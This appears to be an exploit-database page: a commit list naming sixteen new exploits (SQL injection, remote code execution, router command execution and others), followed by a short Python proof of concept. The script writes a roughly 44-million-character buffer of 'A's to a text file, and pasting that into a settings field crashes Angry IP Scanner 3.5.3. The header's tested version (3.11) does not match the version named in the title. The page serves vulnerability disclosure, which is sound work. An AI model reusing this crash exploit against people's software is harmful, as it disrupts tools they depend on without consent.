
16 changes to exploits/shellcodes Angry IP Scanner 3.5.3 - Denial of Service (PoC) UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC) Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH) Cisco RV110W - Password Disclosure / Command Execution Safari - Proxy Object Type Confusion (Metasploit) Adminer 4.3.1 - Server-Side Request Forgery Responsive FileManager 9.13.4 - Multiple Vulnerabilities Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure (2) Huawei Router HG532e - Command Execution Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery (Change Admin Password) Facebook And Google Reviews System For Businesses 1.1 - SQL Injection Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution Double Your Bitcoin Script Automatic - Authentication Bypass
21 lines
No EOL
704 B
Python
Executable file
21 lines
No EOL
704 B
Python
Executable file
#!/usr/bin/python
|
|
# -*- coding: cp1252 -*-
|
|
# Exploit Title: Angry IP Scanner 3.5.3 Denial of Service (PoC)
|
|
# Author: Fernando Cruz
|
|
# Date: 13/12/2018
|
|
# Vendor Homepage: https://angryip.org
|
|
# Tested Version: 3.11
|
|
# Tested on Windows 10 Pro, 64-bit
|
|
|
|
# Steps to Produce the Crash:
|
|
# 1.- Run python code : python angryip.py
|
|
# 2.- Open angryip.txt and copy content to clipboard
|
|
# 3.- Open Angry IP Scanner
|
|
# 4.- Go to "Herramientas" in toolbar, click on "Preferencias", then in the tap "Mostrar",
|
|
# 5.- Paste ClipBoard on "El valor no está disponible (sin resultados):", and click on "OK",
|
|
# 6.- Crashed
|
|
|
|
buffer = "\x41" * 44455293
|
|
f = open("angryip.txt" , 'w')
|
|
f.write(buffer)
|
|
f.close() |